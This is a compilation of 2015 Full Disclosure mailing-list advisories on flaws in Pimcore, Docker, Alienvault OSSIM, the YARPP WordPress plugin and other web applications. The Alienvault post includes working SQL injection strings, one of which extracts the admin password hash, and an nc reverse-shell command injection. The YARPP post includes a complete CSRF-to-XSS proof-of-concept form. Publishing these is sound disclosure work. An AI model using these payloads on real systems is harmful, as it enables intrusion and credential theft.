[FD] Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities
Document Title: === Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1482 Release Date: = 2015-05-08 Vulnerability Laboratory ID (VL-ID): 1482 Common Vulnerability Scoring System: 6.2 Product Service Introduction: === Pimcore is a powerful and robust Zend Framework based PHP content management system (CMS) for creating and managing digital content and assets licensed under the open-source BSD license. Create outstanding digital experiences on the most flexible content management platform available. Manage and edit any type of digital content, for any device and channel in a 100% flexible and personalized way. Pimcore features award-winning single-source and multi-channel publishing functionality making it easy to manage, update, and integrate content and data from various sources. With pimcore brands can create and manage rich digital experiences for all of their output channels at once: web, mobile, apps, social platforms, print and digital signage. With pimcore you can truly `edit once reuse anywhere`. (Copy of the Homepage: https://www.pimcore.org/ ) Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered multiple vulnerabilities in the official PIM Core v3.0.5 Content Management System. Vulnerability Disclosure Timeline: == 2015-05-01: Researcher Notification Coordination (Alain Homewood - PwC New Zealand) 2015-05-01: Vendor Notification (PimCore CMS Security Team) 2015-05-05: Vendor Response/Feedback (PimCore CMS Security Team) 2015-05-07: Vendor Fix/Patch (PimCore Developer Team) 2015-05-08: Public Disclosure (Vulnerability Laboratory - Alain Homewood) Discovery Status: = Published Affected Product(s): Pimcore GmbH Product: PimCore - Content Management System 3.0.5 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: 1.1 A (time-based) blind sql injection web vulnerability has been discovered in the official Pimcore v3.0.5 Content Management System (web-application). The vulnerability allows remote attackers or privileged user accounts to execute own sql commands to compromise the affected web-server dbms. A blind authenticated SQL injection vulnerability exists in the filtering functionality of the HTTP error display in the administration panel. Authenticated is required to exploit this vulnerability, however low privilege users may have access to this functionality (i.e. its located under `Marketing - Search Engine Optimisation`). The request method to execute the malicious sql commands is GET and the issue is exists in the code line of the web-application. The security risk of the sql vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. Exploitation of the remote sql injection web vulnerability requires a low privilege application user account without user interaction. Successful exploitation of the sql injection vulnerability results in application and web-service or dbms compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] ./misc/http-error-log Vulnerable Parameter(s): [+] _dc 1.2 A command execution web vulnerability has been discovered in the official Pimcore v3.0.5 Content Management System (web-application). The vulnerability allows remote attackers or local privilege user accounts to compromise the web-server by execution of malicious code. The newsletter sending functionality uses unsanitized user provided input as part of a shell command. Authenticated users can manipulate these values to execute arbitrary commands. Note that low privilege users are likely to have access to this functionality (e.g. marketing users). Authenticated is required to exploit this vulnerability. The request method to execute is POST and the attack vector is located on the application-side of the online service. The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the arbitrary code execution vulnerability requires no user interaction but a low privilege web-application user account. Successful exploitation of the remote vulnerability results in unauthorized execution of system specific codes. Request Method(s): [+] POST Vulnerable Module(s): [+]
Re: [FD] pydio vulnerabilities
https://github.com/pydio/pydio-core/commits/develop https://github.com/pydio/pydio-core/commit/2049254e7a215491019d2646a274a8fb1cf29e3b 2015-05-07 1:32 GMT+03:00 Just A Fake robottomonitorbugt...@gmail.com: Does anyone have any info on the two pydio vulnerabilities announced today? They have been given CVE-2015-3431 and CVE-2015-3432 but a search on mitre just says those are reserved. There is no information or explanation about what the issues are. https://pyd.io/pydio-core-6-0-7/?utm_source=Pydio+Releasesutm_campaign=85ba0d8870-Pydio_6_0_7_Community Thanks for any info anyone has. Robot ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security Vulnerabilities
*MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security
Vulnerabilities*
Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection
Security Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore] (@justqdjing)
*Proposition Details:*
*(1) Vendor Product Description:*
*Vendor:*
MT.VERNON MEDIA
*Product Vulnerable Versions:*
Web-Design
v1.12
*Vendor URL Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html
*Google Dork:*
developed by: Mt. Vernon Media
*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:
Internet Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads
*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored XSS attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.
Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. Openwall software releases and other related files
are also available from the Openwall file archive and its mirrors. You are
encouraged to use the mirrors, but be sure to verify the signatures on
software you download. The more experienced users and software developers
may use our CVSweb server to browse through the source code for most pieces
of Openwall software along with revision history information for each
source file. We publish articles, make presentations, and offer
professional services. Openwall has published suggestions, advisories,
solutions details related to SQL Injection vulnerabilities.
*(2.1) *The first programming code flaw occurs at section.php? page with
id parameter.
*(2.2) *The second programming code flaw occurs at illustrated_verse.php?
page with id parameter.
*(2.3) *The third programming code flaw occurs at image.php? page with
id parameter.
*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple_8.html
https://progressive-comp.com/?a=139222176300014r=1w=1
http://whitehatpost.blog.163.com/blog/static/242232054201548925221/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvmTabId=0Lang=en-USOU=0ItemId=44951
https://www.bugscan.net/#!/x/21160
http://bluereader.org/article/27452998
--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
[FD] Docker 1.6.1 - Security Advisory [150507]
Docker Engine version 1.6.1 has been released to address several vulnerabilities and is immediately available for all supported platforms. Users are advised to upgrade existing installations of the Docker Engine and use 1.6.1 for new installations. It should be noted that each of the vulnerabilities allowing privilege escalation may only be exploited by a malicious Dockerfile or image. Users are advised to run their own images and/or images built by trusted parties, such as those in the official images library. Please send any questions to secur...@docker.com. [CVE-2015-3629] Symlink traversal on container respawn allows local privilege escalation Libcontainer version 1.6.0 introduced changes which facilitated a mount namespace breakout upon respawn of a container. This allowed malicious images to write files to the host system and escape containerization. Libcontainer and Docker Engine 1.6.1 have been released to address this vulnerability. Users running untrusted images are encouraged to upgrade Docker Engine. Discovered by Tõnis Tiigi. == [CVE-2015-3627] Insecure opening of file-descriptor 1 leading to privilege escalation == The file-descriptor passed by libcontainer to the pid-1 process of a container has been found to be opened prior to performing the chroot, allowing insecure open and symlink traversal. This allows malicious container images to trigger a local privilege escalation. Libcontainer and Docker Engine 1.6.1 have been released to address this vulnerability. Users running untrusted images are encouraged to upgrade Docker Engine. Discovered by Tõnis Tiigi. == [CVE-2015-3630] Read/write proc paths allow host modification information disclosure == Several paths underneath /proc were writable from containers, allowing global system manipulation and configuration. These paths included /proc/asound, /proc/timer_stats, /proc/latency_stats, and /proc/fs. By allowing writes to /proc/fs, it has been noted that CIFS volumes could be forced into a protocol downgrade attack by a root user operating inside of a container. Machines having loaded the timer_stats module were vulnerable to having this mechanism enabled and consumed by a container. We are releasing Docker Engine 1.6.1 to address this vulnerability. All versions up to 1.6.1 are believed vulnerable. Users running untrusted images are encouraged to upgrade. Discovered by Eric Windisch of the Docker Security Team. === [CVE-2015-3631] Volume mounts allow LSM profile escalation === By allowing volumes to override files of /proc within a mount namespace, a user could specify arbitrary policies for Linux Security Modules, including setting an unconfined policy underneath AppArmor, or a docker_t policy for processes managed by SELinux. In all versions of Docker up until 1.6.1, it is possible for malicious images to configure volume mounts such that files of proc may be overridden. We are releasing Docker Engine 1.6.1 to address this vulnerability. All versions up to 1.6.1 are believed vulnerable. Users running untrusted images are encouraged to upgrade. Discovered by Eric Windisch of the Docker Security Team. AppArmor policy improvements The 1.6.1 release also marks preventative additions to the AppArmor policy. Recently, several CVEs against the kernel have been reported whereby mount namespaces could be circumvented through the use of the sys_mount syscall from inside of an unprivileged Docker container. In all reported cases, the AppArmor policy included in libcontainer and shipped with Docker has been sufficient to deflect these attacks. However, we have deemed it prudent to proactively tighten the policy further by outright denying the use of the sys_mount syscall. Because this addition is preventative, no CVE-ID is requested. -- Regards, Eric Windisch Docker Security Team ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] SAP vulnerabilities highlighted in many reports such as HP Cyber Risk Report 2015
Recently, HP published their yearly Cyber Risk Report 2015 (http://info.hpenterprisesecurity.com/LP_460192_Cross_CyberriskFullReport_0315_gate ). Having many typical things spotlighted in this report such as growing number of ATM and IOT Security buzz you can find everywhere, ERPScan found some parts which are relevant to business application security. We have prepared deep article from this research, add all details and also collected information from different sources about growing number of SAP vulnerabilities and recent initiatives in helping SAP users to avoid issues (new security guidelines). http://erpscan.com/press-center/blog/sap-vulnerabilities-highlighted-in-many-reports-such-as-hp-cyber-risk-report-2015/#more-7858 -- Darya Maenkova PR manager https://www.linkedin.com/profile/public-profile-settings?trk=prof-edit-edit-public_profile https://twitter.com/d_maenkova http://erpscan.com/ e-mail: d.maenk...@erpscan.com mailto:d.maenk...@erpscan.com address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 phone: 650.798.5255 erpscan.com http://erpscan.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web Security Vulnerabilities
*MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web Security Vulnerabilities* Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple XSS Security Vulnerabilities Product: Web-Design Vendor: MT.VERNON MEDIA Vulnerable Versions: v1.12 Tested Version: v1.12 Advisory Publication: May 07, 2015 Latest Update: May 07, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Writer and Reporter: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] (@justqdjing) *Recommendation Details:* *(1) Vendor Product Description:* *Vendor:* MT.VERNON MEDIA *Product Vulnerable Versions:* Web-Design v1.12 *Vendor URL Download:* MT.VERNON MEDIA can be obtained from here, http://www.mtvernonmedia.com/services/WebDesign.html *Google Dork:* developed by: Mt. Vernon Media *Product Introduction Overview:* In today's economy every business is more focused on ROI (Return On Investment) than ever before. We'll help you ensure a solid ROI for your website, not only making it effective and easy to use for your clients, but helping you to drive traffic to your site and ensuring effective content and design to turn traffic into solid leads, sales, or repeat customers. We offer custom design and development services tailored to your needs and specifications drawn up jointly with you to ensure that the appropriate technology is leveraged for optimum results, creating a dynamic and effective design, based on market effectiveness and user-friendly design standards. Our developers are experts in web application development using various programming languages including Perl, SQL, C, C+, and many other back-end programming languages, as well as database integration. For a view of some of your past projects, take a look at our list of clients. We handle custom development of your Internet project from conception through publication: Internet Intranet sites Design concepts, layouts, and specifications Intuitive Graphical User Interface (GUI) design Dynamic navigation design Creation and manipulation of graphical design elements GIF Animation Flash development HTML hand-coding and debugging JavaScript for interactivity and error-checking ASP (Active Server Pages) Customized Perl CGI scripts (mailing lists, form submission, etc) Customized application development in varied programming languages Site publication and promotion On-going updating and maintenance Banner ads *(2) Vulnerability Details:* MT.VERNON MEDIA Web-Design web application has a computer security bug problem. It can be exploited by stored XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Several other MT.VERNON MEDIA products 0-day vulnerabilities have been found by some other bug hunter researchers before. MT.VERNON MEDIA has patched some of them. BugScan is the first community-based scanner, experienced five code refactoring. It has redefined the concept of the scanner provides sources for the latest info-sec news, tools, and advisories. It also publishs suggestions, advisories, solutions details related to XSS vulnerabilities. *(2.1) *The first programming code flaw occurs at section.php? page with id parameter. *(2.2)* The second programming code flaw occurs at illustrated_verse.php? page with id parameter. *(2.3)* The third programming code flaw occurs at image.php? page with id parameter. *(2.4) *The forth programming code flaw occurs at gallery.php? page with np parameter. *References:* http://www.tetraph.com/security/xss-vulnerability/mt-vernon-media-web-design-v1-12-multiple-xss/ http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple.html http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-multiple-xss/ https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-multiple-xss/ http://whitehatpost.blog.163.com/blog/static/24223205420154885036469 https://progressive-comp.com/?a=139222176300014r=1w=1 https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvmTabId=0Lang=en-USOU=0ItemId=44832 https://www.bugscan.net/#!/x/21289 http://bluereader.org/article/30765596 -- Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS:
[FD] MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security Vulnerabilities
*MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security Vulnerabilities* Exploit Title: MT.VERNON MEDIA Web-Design v1.12 gallery.php? category parameter HTML Injection Security Vulnerabilities Product: Web-Design v1.12 Vendor: MT.VERNON MEDIA Vulnerable Versions: v1.12 Tested Version: v1.12 Advisory Publication: May 08, 2015 Latest Update: May 08, 2015 CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Writer and Reporter: Wang Jing[Mathematics, Nanyang Technological University (NTU), Singapore] (@justqdjing) *Recommendation Details:* *(1) Vendor Product Description:* *Vendor:* MT.VERNON MEDIA *Product Vulnerable Versions:* Web-Design v1.12 *Vendor URL Download:* MT.VERNON MEDIA can be obtained from here, http://www.mtvernonmedia.com/services/WebDesign.html *Google Dork:* developed by: Mt. Vernon Media *Product Introduction Overview:* In today's economy every business is more focused on ROI (Return On Investment) than ever before. We'll help you ensure a solid ROI for your website, not only making it effective and easy to use for your clients, but helping you to drive traffic to your site and ensuring effective content and design to turn traffic into solid leads, sales, or repeat customers. We offer custom design and development services tailored to your needs and specifications drawn up jointly with you to ensure that the appropriate technology is leveraged for optimum results, creating a dynamic and effective design, based on market effectiveness and user-friendly design standards. Our developers are experts in web application development using various programming languages including Perl, SQL, C, C+, and many other back-end programming languages, as well as database integration. For a view of some of your past projects, take a look at our list of clients. We handle custom development of your Internet project from conception through publication: Internet Intranet sites Design concepts, layouts, and specifications Intuitive Graphical User Interface (GUI) design Dynamic navigation design Creation and manipulation of graphical design elements GIF Animation Flash development HTML hand-coding and debugging JavaScript for interactivity and error-checking ASP (Active Server Pages) Customized Perl CGI scripts (mailing lists, form submission, etc) Customized application development in varied programming languages Site publication and promotion On-going updating and maintenance Banner ads *(2) Vulnerability Details:* MT.VERNON MEDIA web application has a computer security bug problem. It can be exploited by stored HTML Injection attacks. Hypertext Markup Language (HTML) injection, also sometimes referred to as virtual defacement, is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. Several other MT.VERNON MEDIA products 0-day vulnerabilities have been found by some other bug hunter researchers before. MT.VERNON MEDIA has patched some of them. BugScan is the first community-based scanner, experienced five code refactoring. It has redefined the concept of the scanner provides sources for the latest info-sec news, tools, and advisories. It also publishs suggestions, advisories, solutions details related to HTML vulnerabilities. *(2.1) *The first programming code flaw occurs at category parameter in gallery.php? page. *References:* http://www.tetraph.com/security/html-injection/mt-vernon-media-web-design-v1-12-html-injection/ http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-html.html http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-html-injection/ https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-html-injection/ http://whitehatpost.blog.163.com/blog/static/24223205420154893850881/ https://progressive-comp.com/?l=full-disclosurem=142907520526783w=2 https://www.bugscan.net/#!/x/21454 http://seclists.org/fulldisclosure/2015/Apr/37 http://lists.openwall.net/full-disclosure/2015/04/15/3 -- Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Alienvault OSSIM/USM Multiple Vulnerabilities
Shortly after I posted this I received an email from Alienvault
stating that a fix is imminent and is planned to be released next week
in version 5.0.2.
Thanks to AV for getting back to me on this.
On Tue, May 5, 2015 at 9:21 PM, Peter Lapp lapp...@gmail.com wrote:
Details
===
Product: Alienvault OSSIM/USM
Vulnerability: Multiple Vulnerabilities (XSS, SQLi, Command Execution)
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects
all previous versions as well.
Fixed Version: No fix has been released.
Summary
===
Alienvault OSSIM is an open source SIEM solution designed to collect
and correlate log data. The vulnerability management section of the UI
allows a user to upload a Nessus scan in NBE format. Using a specially
crafted NBE file, a user can exploit multiple vulnerabilities such as
XSS, SQLi, and Command Execution. Authentication is required to
exploit this vulnerability, but admin privileges are not required. Any
user with access to the Vulnerabilities page can perform these
attacks.
The vendor was notified almost 5 months ago about this vulnerability.
Given that they have not responded to my recent requests for updates
and just released a major version that did not patch these issues, I
have decided to release the details.
Technical Details
=
Various fields within the NBE file can be manipulated to exploit
certain vulnerabilities. A pretty bare template that I used to test
these issues looked something like this:
timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014|
results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234|Security Hole|Synopsis
:\n\nThe remote host contains a web browser that is affected by
multiple vulnerabilities.\nOther references :
OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035\n
timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014|
timestamps|||scan_end|Thu Dec 11 17:16:44 2014|
Reflective XSS
--
The hostname/IP portion of the NBE import is vulnerable. Putting
scriptalert(0)/script directly after the hostname/IP in the NBE
will result in the javascript being reflected back when the import
finishes.
Stored XSS
--
The plugin ID portion of the NBE is vulnerable.
Addingscriptalert(document.cookie)/script to the plugin ID in the
NBE will result in the script being executed every time someone views
the HTML report in the OSSIM interface.
Blind SQL Injection
---
The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT
SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for
20 seconds.
SQL Injection
-
The protocol portion of the NBE is vulnerable to SQL injection.
Take this:
cifs (445/tcp)
And turn it to this:
cifs','0','1(',(select/**/pass/**/from/**/users/**/where/**/login=admin),'N');#
(445/tcp)
That will result in the hash of the admin password being included in
the report. The extra '(' in '1(' is required for the ending ) in
order to not cause an error in the Perl script that runs the import.
Command Injection
-
The hostname/IP portion of the NBE is vulnerable. Adding '#nc -c
/bin/sh 10.10.10.10 ' will result in a reverse shell as www-data
to 10.10.10.10.
The initial # is required to comment out the remainder of a SQL query
that comes before the dig command where this is injected. Without it
the script won't proceed to the required point.
Solution
There's no official patch for this yet. It is possible to restrict
access to the Vulnerabilities page via user roles, which should
prevent a user from exploiting this. Also, if you're not using the
import feature, you could rename the Perl script on the file system
that runs the import.
Timeline
01/12/2015 - Notified the vendor of the vulnerabilities.
01/12/2015 - Vendor confirms the issue and files a defect.
01/28/2015 - Requested an update from the vendor and was told the
issue would be worked on in the future.
04/20/2015 - Requested an update and informed the vendor of my intent
to release the details. No response.
05/05/2015 - Released details to FD.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Yet Another Related Posts Plugin (YARPP) 4.2.4 CSRF - XSS - RCE
'Yet Another Related Posts Plugin' options can be updated with no
token/nonce protection which an attacker may exploit via tricking website's
administrator to enter a malformed page which will change YARPP options,
and since some options allow html the attacker is able to inject malformed
javascript code which can lead to code execution/administrator actions when
the injected code is triggered by an admin user.
injected javascript code is triggered on any post page.
Affected Versions
= 4.2.4
Vulnerability Scope
XSS
RCE (http://research.evex.pw/?vuln=14)
Authorization Required:
None
Proof of Concept:
body onload=document.getElementById('payload_form').submit()
form id=payload_form action=
http://wpsite.com/wp-admin/options-general.php?page=yarpp; method=POST
input type='hidden' name='recent_number' value='12'
input type='hidden' name='recent_units' value='month'
input type='hidden' name='threshold' value='5'
input type='hidden' name='weight[title]' value='no'
input type='hidden' name='weight[body]' value='no'
input type='hidden' name='tax[category]' value='no'
input type='hidden' name='tax[post_tag]' value='consider'
input type='hidden' name='auto_display_post_types[post]'
value='on'
input type='hidden' name='auto_display_post_types[page]'
value='on'
input type='hidden' name='auto_display_post_types[attachment]'
value='on'
input type='hidden' name='auto_display_archive' value='true'
input type='hidden' name='limit' value='1'
input type='hidden' name='use_template' value='builtin'
input type='hidden' name='thumbnails_heading' value='Related
posts:'
input type='hidden' name='no_results'
value='scriptalert(1);/script'
input type='hidden' name='before_related'
value='scriptalert(1);/scriptli'
input type='hidden' name='after_related' value='/li'
input type='hidden' name='before_title'
value='scriptalert(1);/scriptli'
input type='hidden' name='after_title' value='/li'
input type='hidden' name='show_excerpt' value='true'
input type='hidden' name='excerpt_length' value='10'
input type='hidden' name='before_post' value='+small'
input type='hidden' name='after_post' value='/small'
input type='hidden' name='order' value='post_date ASC'
input type='hidden' name='promote_yarpp' value='true'
input type='hidden' name='rss_display' value='true'
input type='hidden' name='rss_limit' value='1'
input type='hidden' name='rss_use_template' value='builtin'
input type='hidden' name='rss_thumbnails_heading' value='Related
posts:'
input type='hidden' name='rss_no_results' value='No Results'
input type='hidden' name='rss_before_related' value='li'
input type='hidden' name='rss_after_related' value='/li'
input type='hidden' name='rss_before_title' value='li'
input type='hidden' name='rss_after_title' value='/li'
input type='hidden' name='rss_show_excerpt' value='true'
input type='hidden' name='rss_excerpt_length' value='10'
input type='hidden' name='rss_before_post' value='+small'
input type='hidden' name='rss_after_post' value='/small'
input type='hidden' name='rss_order' value='score DESC'
input type='hidden' name='rss_promote_yarpp' value='true'
input type='hidden' name='update_yarpp' value='Save Changes'
/form
/body
Fix:
No Fix Available at The Moment.
Timeline:
Notified Vendor - No Reply
Notified Vendor Again- No Reply
Publish Disclosure
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] AMD Bulldozer Linux ASLR weakness: Reducing entropy by 87.5%
Hi, PaX solution has actually 16 random bits for mmap objects in 32bit systems on non affected systems. On affected systems the random bits are degraded to 2^13. Unfortunately, depending on the PaX Kernel configuration sequence, some features may not be enabled. There are sequences of PaX configuration which does not give the expected result. The configuration sequence that results in a miss-configured system is: 1.- Starting from a clean Linux tree with PaX patch applied. 2.- Enabled the Grsecurity option (which sets Security Method to Custom) and compiletest: Observed mmap entropy: 2^5 (as expected). 3.- Then set Security Method to Automatic (which sets Required Priorities to Performance) and compiletest: Observed mmap entropy: 2^5. 4.- Last test: select Security on the Required Priorities option and compiletest: Observed mmap entropy: 2^5. 5.- At this point, it seems that the Required Priorities option has no effect, that is, switching from Performance to Security or the other way around (as may times as desired) does not enable/disable the expected features, including the mmap randomization. If steps 2 and 3, or 2 and 4 are configured at once (without exiting from the menuconfig), then the system gets properly configured. It seems that something in the PaX Kconfig files are not properly done. Could anyone check it ? So, if you are using PaX, it worth to ensure that you are not losing any PaX feature. -- Hector Marco-Gisbert @ http://hmarco.org/ Cyber Security Researcher @ http://cybersecurity.upv.es Universitat Politècnica de València (Spain) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities
*Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities* Exploit Title: Feed2JS v1.7 magpie_debug.php? url parameter XSS Security Vulnerabilities Product: Feed2JS Vendor: feed2js.org Vulnerable Versions: v1.7 Tested Version: v1.7 Advisory Publication: May 09, 2015 Latest Update: May 09, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Writer and Reporter: Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (@justqdjing) *Proposition Details:* *(1) Vendor Product Description:* *Vendor:* feed2js.org *Product Vulnerable Versions:* Feed2JS v1.7 *Vendor URL Download:* Feed2JS can be downloaded from here, https://feed2js.org/index.php?s=download *Source code:* http://www.gnu.org/licenses/gpl.html *Product Introduction Overview:* What is Feed to JavaScript? An RSS Feed is a dynamically generated summary (in XML format) of information or news published on other web sites- so when the published RSS changes, your web site will be automatically changed too. It is a rather simple technology that allows you, the humble web page designer, to have this content displayed in your own web page, without having to know a lick about XML! Think of it as a box you define on your web page that is able to update itself, whenever the source of the information changes, your web page does too, without you having to do a single thing to it. This Feed2JS web site (new and improved!) provides you a free service that can do all the hard work for you-- in 3 easy steps: Find the RSS source, the web address for the feed. Use our simple tool to build the JavaScript command that will display it Optionally style it up to look pretty. Please keep in mind that feeds are cached on our site for 60 minutes, so if you add content to your RSS feed, the updates will take at least an hour to appear in any other web site using Feed2JS to display that feed. To run these scripts, you need a web server capable of running PHP which is rather widely available (and free). You will need to FTP files to your server, perhaps change permissions, and make some basic edits to configure it for your system. I give you the code, getting it to work is on your shoulders. I will try to help, but cannot always promise answers. *(2) Vulnerability Details:* Feed2JS web application has a computer security bug problem. It can be exploited by stored XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Several other Feed2JS products 0-day vulnerabilities have been found by some other bug hunter researchers before. Feed2JS has patched some of them. Openwall software releases and other related files are also available from the Openwall file archive and its mirrors. You are encouraged to use the mirrors, but be sure to verify the signatures on software you download. The more experienced users and software developers may use our CVSweb server to browse through the source code for most pieces of Openwall software along with revision history information for each source file. We publish articles, make presentations, and offer professional services. Openwall has published suggestions, advisories, solutions details related to XSS vulnerabilities. *(2.1)* The first programming code flaw occurs at url parameter in magpie_debug.php? page. *References:* http://www.tetraph.com/security/xss-vulnerability/feed2js-v1-7-xss/ http://securityrelated.blogspot.com/2015/05/feed2js-v17-xss-cross-site-scripting.html http://www.inzeed.com/kaleidoscope/computer-web-security/feed2js-v1-7-xss/ https://vulnerabilitypost.wordpress.com/2015/05/08/feed2js-v1-7-xss/ http://whitehatpost.blog.163.com/blog/static/24223205420154810359682/ https://progressive-comp.com/?l=full-disclosurem=142907534026807w=2 https://www.bugscan.net/#!/x/21291 http://bluereader.org/article/27452996 http://lists.openwall.net/full-disclosure/2015/04/15/4 -- Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical 